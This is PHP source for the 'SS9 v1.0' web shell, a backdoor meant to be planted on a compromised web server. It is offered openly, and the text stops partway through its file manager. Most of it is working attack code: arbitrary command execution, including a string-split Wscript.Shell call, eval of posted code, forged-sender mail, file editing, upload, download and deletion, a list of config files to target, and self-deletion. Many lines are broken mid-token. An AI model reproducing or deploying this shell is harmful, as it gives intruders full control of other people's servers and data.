<?

php
/*##############################################################################
#############*\
|#+----------------------------------------------------------------------------------------+#|
|*#
#*|
|*#
@@@
@@@
@@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
#*|
|*#
@@
@@
@@@ @@
#*|
|*#
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@@
@@@
@@@
#*|
|*#
#*|
|#+----------------------------------------------------------------------------------------+#|
\*##############################################################################
#############*/
/*##########################################*\
|#+----------------------------------------+#|
|#+ Script : SS9 v 1.0 (phpshell)
+#|
|#+ (C)oded By : ServeR00T
+#|
|#+ Last Modify : 04/07/2008
+#|
|#+ Email : inlove.511[at]gmail[com]
+#|
|#+----------------------------------------+#|
\*##########################################*/
// $login['use'] = 1; no. 1 for enable this trait.
// $login['use'] = 0; no. 0 for disable this trait.
$login['use'] = 0;
// username and password crypt with md5()
// default username and password '8bf0abc0c4d5c9abb79cd816e4a545bd' is 'ss9'
$login['user'] = "8bf0abc0c4d5c9abb79cd816e4a545bd"; // username
$login['pass'] = "8bf0abc0c4d5c9abb79cd816e4a545bd"; // password
############### MySQL Settings ###############
$mysql['host'] = "localhost";
$mysql['user'] = "username";
$mysql['pass'] = "password";
$mysql['db'] = "database";
##############################################
############### Security Shell ###############
if ($login['use'] == 1)
{
if (!isset($_SERVER['PHP_AUTH_USER']) or md5($_SERVER['PHP_AUTH_
USER']) != $login['user'] or md5($_SERVER['PHP_AUTH_PW']) != $login['pass'])

{
header('WWW-Authenticate: Basic realm="This File is Secu
red :>"');
header('HTTP/1.0 401 Unauthorized');
exit("<br><br><br><br><p align='center'><font face='Taho
ma' size='2'><b>You Don't Have Access To Read This File.</b></font></p>");
}
}
ob_start();
error_reporting(7);
if (fetch_env('register_globals') != 1)
{
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
if (get_magic_quotes_gpc())
{
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
############### Set Variables ################
$pwd
= getcwd();
$dis_func
= fetch_env("disable_functions");
$safe_mode
= fetch_env('safe_mode');
$safemode
= ($safe_mode == "on" or strtolower($safe_mode) == "on") ?
'<font color="red">ON (Secured)</font>' : '<font color="green">OFF (Not Secured
)</font>';
$danger_files = array("config.php", "config.inc.php", "connect.php", "my
sql.php", "connectmysql.php", "info.php", "info.inc.php");
$tb
= new FORMS;
################ Delete Self #################
if ($_GET['act'] == "delete")
{
@unlink(__FILE__);
}
################### About ####################
if ($_GET['act'] == "about")
{
doheader();
msg('<div align="left" style="font-size: 13px"><font face="lucid
a console"><br>
/*##############################################################################
#############*\
|#+----------------------------------------------------------------------------------------#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&

nbsp;&nbsp;&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@@&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;@@@&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@@&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb

sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#----------------------------------------------------------------------------------------#*|
|*##############################################################################
#############*|
|*#----------------------------------------------------------------------------------------#*|
|*#&nbsp;Script&nbsp;:&nbsp;SS9&nbsp;v&nbsp;1.0&nbsp;(phpshell)&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;(C)oded&nbsp;By&nbsp;:&nbsp;ServeR00T&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;Last&nbsp;Modify&nbsp;:&nbsp;03/07/2008&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;Email&nbsp;:&nbsp;inlove.511[at]gmail[com]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#----------------------------------------------------------------------------------------+*|
\*##############################################################################
#############*/&nbsp;
</font></div>');
dofooter();
exit;
}
################## PHPinfo ###################
if ($_GET['act'] == "phpinfo")
{
echo $phpinfo = (!eregi("phpinfo",$dis_func)) ? phpinfo() : "<ce
nter>phpinfo()</center>";
exit;
}
################## Command ###################
if ($_GET['act'] == "cmd")
{
doheader();
if (substr(PHP_OS, 0, 3) == 'WIN')
{
$program = isset($_POST['program']) ? $_POST['program']
: $_SERVER['COMSPEC'];
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net

start > " . $pathname . "/log.txt";

}
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'
system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'
=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'pa
ssthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$content = $tb->headerform2(array('content'=>'&nbsp;&nbsp;' .
$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execf
unc)) . ' ' . $tb->makeinput('command') . ' ' . $tb->makeinput('Run','command','
','submit')));
html_cmd($content);
if (isset($_POST['command']))
{
if ($execfunc == "system")
{
system($_POST['command']);
}
elseif ($execfunc == "passthru")
{
passthru($_POST['command']);
}
elseif ($execfunc == "exec")
{
$result = exec($_POST['command']);
echo $result;
}
elseif ($execfunc == "shell_exec")
{
$result = shell_exec($_POST['command']);
echo $result;
}
elseif ($execfunc == "popen")
{
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
}
elseif ($execfunc == "wscript")
{
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or d
ie("PHP Create COM WSHSHELL Failed");
$exec = $wsh->exec("cm"."d.e"."xe /c " . $_POST[
'command']);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
}
else
{
system($_POST['command']);
}
}
print("</textarea></td>
</tr>
</table>

</td>
</tr>
</table>");
dofooter();
exit;
}
#################### Eval ####################
if ($_GET['act'] == 'eval')
{
if (isset($_POST['code']))
{
eval($_POST['code']);
exit;
}
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Eval :</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=eval" method="POST">
<tr class="secondalt">
<td align="center">
<textarea name="code" cols="90" rows="20">Code Here</tex
tarea><br>
<input type="submit" class="input" name="submit" value="
eval code">
</td>
</tr>
</table>');
dofooter();
exit;
}
################## Send Mail #################
if ($_GET['act'] == 'mail')
{
doheader();
if ($_GET['do'] == 'send')
{
$send = @mail($_POST['to'],$_POST['subject'],$_POST['msg
'],"From: ".$_POST['from']."\r\n");
if ($send)
{
msg('Successfully send message.');
goto($REQUEST_URI . '?');
}
else
{
msg('Sorry, Can\'t send message.');
goto($REQUEST_URI . '?');

}
dofooter();
exit;
}
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Send Mail :</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=mail&do=send" method="POST">
<tr class="secondalt">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0">
<tr>
<td><b>From :</b></td>
</tr>
<tr>
<td><input type="text" class="input" name="from"
size="40" value="you@isp.com"></td>
</tr>
<tr>
<td><b>To :</b></td>
</tr>
<tr>
<td><input type="text" class="input" name="to" s
ize="40" value="he@isp.com"></td>
</tr>
<tr>
<td><b>Subject :</b></td>
</tr>
<tr>
<td><input type="text" class="input" name="subje
ct" size="40"></td>
</tr>
<tr>
<td><b>Message :</b></td>
</tr>
<tr>
<td><textarea name="msg" cols="90" rows="20"></t
extarea></td>
</tr>
<tr>
<td align="center"><input type="submit" class="i
nput" name="submit" value=" Send "></td>
</tr>
</table>
</td>
</tr>
</table>');
dofooter();
exit;
}

################# Edit File ##################

if ($_GET['act'] == 'editfile')
{
doheader();
if (isset($_POST['editfile']))
{
$filename = $_POST['editfile'];
$fp = fopen($_POST['editfile'], "r");
$file = file($_POST['editfile']);
}
elseif (isset($_GET['file']))
{
$filename = $_GET['file'];
$fp = fopen($_GET['file'], "r");
$file = file($_GET['file']);
}
foreach ($file as $string)
{
$content .= $string;
}
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Edit file: ' . $filename . '</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=savefile" method="POST">
<tr class="secondalt">
<td align="center">
<textarea name="content" cols="90" rows="20">' . htmlent
ities($content) . '</textarea>
<input type="hidden" name="savefile" value="' . $filenam
e . '"><br>
<input type="submit" class="input" name="submit" value="
Save">
</td>
</tr>
</table>');
fclose($fp);
dofooter();
exit;
}
################# Save File ##################
if ($_GET['act'] == 'savefile')
{
doheader();
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($_POST['content']);
fwrite($fp, $content);
fclose($fp);
msg('Successfully saved!');
goto($REQUEST_URI . '?');
dofooter();

exit;
}
############### Delete File ##################
if ($_GET['act'] == 'delfile')
{
doheader();
if (@unlink($_GET['pwd'] . "/" . $_GET['file']))
{
msg('Successfully deleted!');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
else
{
msg('Sorry,don\'t deleted!');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
}
################ Download File ###############
if ($_GET['act'] == "download")
{
doheader();
$fp = fopen($_POST['downname'],"r");
if (!$fp)
{
msg('Sorry, Can\'t open this file.');
goto($REQUEST_URI . '?');
dofooter();
}
else
{
ob_clean();
$filename = basename($_POST['downname']);
$filedump = fread($fp,filesize($_POST['downname']));
fclose($fp);
$content_encoding = $mime_type = '';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding))
{
header('Content-Encoding: ' . $content_encoding)
;
}
header("Content-type: " . $mime_type);
header('Content-disposition: attachment; filename="' . $
filename . '";');
print($filedump);
dofooter();
exit;
}
}
################ Upload File #################
if ($_GET['act'] == 'upload')
{
doheader();

if (@copy($_FILES['uploadfile']['tmp_name'],$_POST['uploaddir']
. "/" . $_FILES['uploadfile']['name']))
{
msg('Done Upload File.');
goto($REQUEST_URI . "?");
}
else
{
msg('Sorry, Don\'t Upload File.');
goto($REQUEST_URI . "?");
}
dofooter();
exit;
}
################ Rename File #################
if ($_GET['act'] == 'rename')
{
doheader();
if (rename($_POST['oldname'],$_POST['newname']))
{
msg('Done Rename File.');
goto($REQUEST_URI . "?");
}
else
{
msg('Sorry, Don\'t Rename File.');
goto($REQUEST_URI . "?");
}
dofooter();
exit;
}
################## Search ####################
if ($_GET['act'] == 'search')
{
if ($_GET['do'] == 'search')
{
if ($_POST['mask'] == '1' and !empty($_POST['searchmask'
]))
{
$SR = new SearchResult($_POST['searchdir'],$_POS
T['searchtext'],$_POST['searchmask']);
}
else
{
$SR = new SearchResult($_POST['searchdir'],$_POS
T['searchtext']);
}
$SR->SearchText(0,0);
$res = $SR->GetResultFiles();
$found = $SR->GetMatchesCount();
$titles = $SR->GetTitles();
$result = css();
if ($found > 0)
{
$result .= "\n" . '<html dir="ltr">' . "\n" . '<
head>' . "\n" . css() . "\n" . '<title>SS9 v1.0 - Search</title>' . "\n" . '</he
ad>' . "\n" . '<body bgcolor="#000000"><center>' . "\n" . '<table width="775" bo

rder="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">' . "\n";

foreach($res as $file=>$v)
{
$result .= '<tr class="top">' . "\n";
$result .= '<td align="left"><table widt
h="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>:> <b>' . str_replace
("/","\\",$file) . "</b></td></tr></table></td>\n";
$result .= '</tr>' . "\n" . '<tr class="
secondalt">' . "\n" . '<td align="center">' . "\n";
foreach($v as $a=>$b)
{
$result .= '<table width="98%" b
order="1" cellpadding="0" cellspacing="0">' . "\n";
$result .= "<tr>\n";
$result .= '<td width="5%">' . $
a . "</td>\n";
$result .= '<td width="95%"> ' .
$b . "</td>\n";
$result .= "</tr>\n";
$result .= "</table>\n";
}
}
$result .= "</table></td></tr></table></center><
/body></html>";
print($result);
exit;
}
else
{
doheader();
msg('Sorry, Don\'t exists any result.');
dofooter();
exit;
}
}
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center" colspan="2">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Search text in files:</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=search&do=search" method="POST">
<tr class="secondalt">
<td width="10%">Search text:</td>
<td width="90%"><input type="text" name="searchtext" class="inpu
t" size="40"></td>
</tr>
<tr class="secondalt">
<td>Search dir:</td>
<td><input type="text" name="searchdir" class="input" value="' .
$pwd . '" size="40"></td>
</tr>
<tr class="secondalt">
<td>Only in files:</td>

<td><input type="checkbox" name="mask" value="1"> <input type="t

ext" name="searchmask" class="input" value=".txt;.php" size="40"></td>
</tr>
<tr class="secondalt">
<td align="center" colspan="2"><input type="submit" class="input
" name="submit" value="Search"></td>
</tr>
</table>');
dofooter();
exit;
}
############## Make directory ################
if ($_GET['act'] == 'mkdir')
{
doheader();
if (!empty($_POST['newdirectory']))
{
$mkdir = $pwd . "/" . $_POST['newdirectory'];
if (is_dir($mkdir))
{
msg("Sorry, I exists this directory.");
goto($REQUEST_URI . '?');
}
else
{
if (mkdir($mkdir,0777))
{
msg('Successfully make directory [' . $m
kdir . '].');
@chmod($mkdir,0777);
goto($REQUEST_URI . '?');
}
else
{
msg("Can't make directory.");
goto($REQUEST_URI . '?');
}
}
}
else
{
msg("Sorry, You don't write directory name.");
goto($REQUEST_URI . '?');
}
dofooter();
exit;
}
############### Delete Dir ###################
if ($_GET['act'] == 'deldir')
{
doheader();
if (@rmdir($_GET['dirpath']))
{
msg('Successfully deleted!');
goto($REQUEST_URI . '?');
}
else
{

msg('Sorry,don\'t deleted!');
goto($REQUEST_URI . '?');
}
dofooter();
exit;
}
################ File Manager ################
if (!isset($_GET['act']))
{
doheader();
$pathname = str_replace('\\','/',dirname(__FILE__));
if (!isset($_GET['dir']) or empty($_GET['dir']))
{
$dir = ".";
$nowpath = getPath($pathname, $dir);
}
else
{
$dir = $_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
$tb->tableheader();
echo"<tr class='top'><td align='center' nowrap width='45%'><b>DI
R</b></td><td align='center' nowrap width='10%'><b>First Modify</b></td><td alig
n='center' nowrap width='10%'><b>Last Modify</b></td><td align='center' nowrap w
idth='10%'><b>Size</b></td><td align='center' nowrap width='10%'><b>Edit</b></td
><td align='center' nowrap width='10%'><b>Delete</b></td><td align='center' nowr
ap width='5%'><b>Perm</b></td></tr>";
$dirs = @opendir($dir);
$dir_i = 0;
while ($file = @readdir($dirs))
{
$filepath = $dir . "/" . $file;
$a = @is_dir($filepath);
if($a == "1")
{
if($file != ".." and $file != ".")
{
$ctime = @date("Y-m-d H:i:s",@filectim
e($filepath));
$mtime

= @date("Y-m-d H:i:s",@filemtim

e($filepath));
$dirperm = substr(base_convert(fileperms
($filepath),10,8),-4);
$dirperm = (substr($dirperm,1,3) == 777
or 666) ? '<font color="green">' . $dirperm . '</font>' : $dirperm;
print('<tr class="' . getrowbg() . '">')
;
echo " <td style=\"padding-left: 5px;\"
>[<a href=\"?dir=" . $dir . "/" . urlencode($file) . "\">" . $file . "</a>]</td>
";
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">' . $ctime . '</span></td>');
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">' . $mtime . '</span></td>');

print(' <td align="center" nowrap class

="smlfont"><span class="ccfont">&lt;DIR&gt;</span></td>');
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">&lt;DIR&gt;</span></td>');
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont"><a href="' . $REQUEST_URI . '?act=deldir&dirpath
=' . $nowpath . '/' . $file . '">[Delete]</a></span></td>');
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">' . $dirperm . '</span></td>');
print("</tr>");
$dir_i++;
}
else
{
if($file == "..")
{
